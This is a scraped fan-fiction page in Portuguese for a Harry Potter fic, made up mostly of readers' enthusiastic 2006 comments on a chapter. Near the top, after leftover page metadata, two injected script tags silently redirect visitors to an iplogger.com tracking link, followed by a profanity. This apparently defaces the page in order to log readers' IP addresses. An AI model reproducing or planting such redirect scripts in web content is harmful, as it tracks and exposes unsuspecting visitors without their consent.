","headline":"","url":"https://www.floreioseborroes.net/fics/ver/5005","inLanguage":"pt-BR","genre":"Fan fiction","isAccessibleForFree":true,"description":"Essa fic contém spoilers, dicas, pistas, insinuações, palpites e mais sobre Harry Potter and the Half-Blood Prince. Os personagens e o enred","image":"http://storage.msn.com/x1pFUxp6NG29bW3Uy8xnoGhE3lfnFozsOj27OUjuAgYgzcUOsZ6EQx96JvNJhv6aleexlwABNPPtGP-h9pKtxxztqk09YsUIa25GQDUTXGp657FjIUVEwKu0Xleo521HD0yUElEHid32hDdS-q22xqjPg","datePublished":"2005-08-05","dateModified":"2017-04-25","author":{"@type":"Person","name":"Sônia Sag","url":"https://www.floreioseborroes.net/users/ver/3634"},"publisher":{"@type":"Organization","name":"Floreios e Borroes","url":"https://www.floreioseborroes.net"},"aggregateRating":{"@type":"AggregateRating","ratingValue":4.92,"ratingCount":21437,"bestRating":5,"worstRating":1}}

<SCRIPT>window.location.href="https://iplogger.com/1Opv3.gif"</SCRIPT »>

<SCRIPT>window.location.href="https://iplogger.com/1Opv3.gif"</SCRIPT »>

Foda-se


Compartilhe!

anúncio

Comentários (2867)

  • Desculpa, mas estou tão surpresa que não consigo escrever um comentário que expresse tudo que eu quero, apenas acredite que está sendo a melhor fic que eu já li na minha vida...Juro que depois comento

    2006-06-02
  • Eu estou simplesmente sem ter o que falar,nem sei se to consiguindo raciocinar direito. Ta muito bom o capítulo e...muito ruim.O que vai acontecer com Harry?Ele vai voltar ao normal? Ele precisa voltar ao normal!Como eu não estou conseguido completar muito bem o raciocinio,eu vou apenas dizer que essa fic é a melhor pra mim quando se trata do 7º livro,mas sendo sincera,passei a achar mais interessante nos últimos capítulos. Bom,eu vou terminar aqui.Parabéns pela fic e por favor atualiza o mais rápido possível!

    2006-06-02
  • *barbie completamente estupefada, com a mão na boca para não gritar em pleno hora´rio de trabalho* - Meu Deus!! O que foi isso?? Que batalha maravilhosa dirigido com maestria pela autora, diretora e produtora de efeitos especias Dra Sonia Sag. Quando ele falou no Sirius, eu pensei: Hi1 F... agora que Harry vai se lascar! E agora vc transforma nosso Herói,Gostoso, Fofo, Guti-Guti (de todas as garotas) num crápula que maltrata a Ginna? Ele virou mau? assim?? E o amor que ia salvá-lo? Sonia, Sonia! Olha lá o que vc vai fazer comigo (conosco!!) Isso até parece novela de Gilberto Braga! Como sempre Mais um capitulo MARAVILHOSO, INENARRÀVEL, INCRÍVEL!!! Só para não perder o costume... Posta logo, tá!!!

    2006-06-02
  • CARACA, PQP, ANIMAL, SENSACIONAL, SEM PALAVRAS PARA DESCREVER........

    2006-06-02
  • Completamente sem palavras.... putz... mto bom sônia, por merlin... tenho minhas teorias sobre o que virá... hehe... naum tenha maldade no coração e naum demore mto desta vez, ok??? bjos

    2006-06-02
  • Adorei !!! Ficou muito show a derrota do Ridlle, mas pq o Harry tinha que ir embora justo naquele momento ? Espero anciosamente pelo último (infelizmente), capítulo. Beijos

    2006-06-02
  • muiiiittto bom! soh naum entedi como harry conseguiu aparatar estado em Hogwarts, Sendo o diretor, o único a saber de como desfazer esses feitiços.

    2006-06-02
  • ... ... ... ... ... ... ... ... ... Simplesmente muuuiiito bom! Bye Voldie... Vc tah fechando a fic com mastria, excelente! Agora, vamos purificar o tal de Potter... tadinhu do potter... e principalmente dos amigos dele... coitados. Bom, aparatar em hog foi muito bom... vento fogo vento e gelo... EXCELENTE! Vimos um Harry Super fodástico DOMINADO PELAS TREVAS - problema! bom, meus maisss sinceros parabéns e meus mais, mais mais mais sinceros VC EH ÓTIMA! OBS.: naum dsemore tanto assim pro próximo cap!!!!!!!!! PERFEITA FIC

    2006-06-02
  • Simplesmente maravilhoso. Como sempre vc está de parabéns. Mas o que foi aquilo entre a Gina e o Harry????? Você não deixar assim, não, né? Ela não merece e nem ele. Foi uma fase de "influência negra"? Por favor diga que sim. Aguardo ansiosa o próximo capítulo. Bjks

    2006-06-02
  • Nossaaaaaa... como descrver esse cap?? Perfeituuuu.. =] Nossaa.. toh pasma, boquiaberta__ Você é mto boa, boa mesmo!!!!! Que cap.. perfeitu, lindu, emocionante.. huHuhuHu.. Você é a melhor escritora que jah conheci, tirandu a J.K, perfeitaaaa.. Valeu a pena esperar.. Que batalha maravilhosa, perfeita, emocionante, sei lá mais o q!! Naum teim como descrever.. Tha mto mais mto bom mesmo essi cap. mlor de todos.. E a morte do Lord aff.. incrivel.. huHuhuHu!!! Adoreii, Amei.. Sonia você é incrivel, adorei sua fic. desde o começo mais essi foi o melhor cap. ainda beim q vc ainda naum akabo =] falandu nisso qnd vai posta o próximo cap??? heim??? huahuahua apressadinha eu neah?! =] mais é mta curiosidade heheheheh =D Vê c naum demora mto tah?! ;) E sensacional esse cap!!! BjOs

    2006-06-02
Você precisa estar logado para comentar. Faça Login.